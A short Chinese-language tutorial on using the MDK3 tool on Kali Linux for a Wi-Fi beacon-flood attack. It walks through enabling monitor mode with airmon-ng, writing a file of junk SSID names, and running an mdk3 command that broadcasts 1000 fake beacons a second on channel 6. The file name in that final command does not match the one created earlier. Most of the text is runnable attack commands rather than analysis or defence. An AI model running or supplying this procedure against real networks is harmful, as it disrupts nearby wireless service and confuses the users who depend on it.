背景知识
MDK3 是一款无线DOS 攻击测试工具,能够发起Beacon Flood、Authentication DoS、Deauthentication/Disassociation Amok 等模式的攻击,另外它还具有针对隐藏ESSID 的暴力探测模式、802.1X 渗透测试、WIDS干扰等功能,可以说是WiFi攻击中比较实用的一款工具。
开始实施
首先我们先开启网卡监听模式:
airmon-ng start wlan0 打开监听模式 airmon-ng stop wlan0mon 关闭监听模式,关闭之后就变回wlan0
然后我们输入ifconfig查看网卡是否开启了监听模式,即查看网卡名后是否增加了mon。
root@kali-linux:~# ifconfig
wlan0mon: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
unspec 60-57-18-BD-94-99-30-30-00-00-00-00-00-00-00-00 txqueuelen 1000 (UNSPEC)
RX packets 59 bytes 6198 (6.0 KiB)
RX errors 0 dropped 59 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
这里可以看到我们的网卡已经开启监听模式了
然后我们就要先在一个文本罗列出一个垃圾WiFi的名称
我们在根目录下写入一个文本:
leafpad wifiname
【leafpad 是一款linux下的轻量级编辑器。类似于windows下的notepad(记事本)】
在wifiname下写入WiFi的名称,要注意换行。
mdk3 wlan0mon b -c 6 -s 1000 -f ./wifinam //wlan0mon -->开启监听模式的无线网卡名称 //b -->mdk3工具B型攻击 //-c 6 -->向信频6发送大量SSID //-s 1000 -->向这个信频每秒广播1000个数据 //-f ./wifiname -->自定义WiFi名称(即SSID)文件路径
之后就可以等待wifi的出现了!